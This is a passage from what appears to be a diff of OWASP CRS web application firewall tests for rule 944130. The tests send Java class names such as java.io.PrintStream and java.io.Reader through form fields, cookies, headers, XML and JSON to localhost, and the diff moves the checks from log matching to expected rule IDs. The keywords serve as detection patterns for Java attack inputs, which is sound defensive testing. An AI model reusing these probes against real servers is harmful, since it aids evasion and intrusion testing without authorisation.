port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-230 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 230 desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PrintStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-231 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PrintStream\"}" + output: + log: + expect_ids: [944130] + - 
test_id: 231 desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PrintStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-232 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PrintStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 232 desc: "Argument test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-233 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" 
+ Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 233 desc: "Argument name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-234 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 234 desc: "Cookie test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PushbackInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-235 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PushbackInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 235 desc: "Cookie name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PushbackInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-236 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PushbackInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 236 desc: "Request header test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - test: java.io.PushbackInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-237 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PushbackInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 237 desc: "XML attribute value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-238 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 238 desc: "XML element value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-239 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 239 desc: "Nested XML element value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-240 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 240 desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" stages: 
- - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-241 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 241 desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PushbackInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-242 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"{\"test\": \"java.io.PushbackInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 242 desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PushbackInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-243 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PushbackInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 243 desc: "Argument test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-244 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 244 desc: "Argument name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-245 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader=test" + output: + log: + expect_ids: [944130] + - test_id: 245 desc: "Cookie test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.Reader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - 
test_title: 944130-246 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.Reader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 246 desc: "Cookie name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.Reader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-247 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.Reader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 247 desc: "Request header test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.Reader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-248 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.Reader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 248 desc: "XML attribute value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-249 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 249 desc: "XML element value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-250 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 250 desc: "Nested XML element value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-251 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 251 desc: "Content-Type text/plain includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-252 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 252 desc: "Content-Type application/json arg value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.Reader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-253 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.Reader\"}" + output: + log: + expect_ids: [944130] + - test_id: 253 desc: "Content-Type application/json arg 
name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.Reader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-254 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.Reader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 254 desc: "Argument test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-255 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: 
"/post" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 255 desc: "Argument name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-256 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader=test" + output: + log: + expect_ids: [944130] + - test_id: 256 desc: "Cookie test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.StringReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-257 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
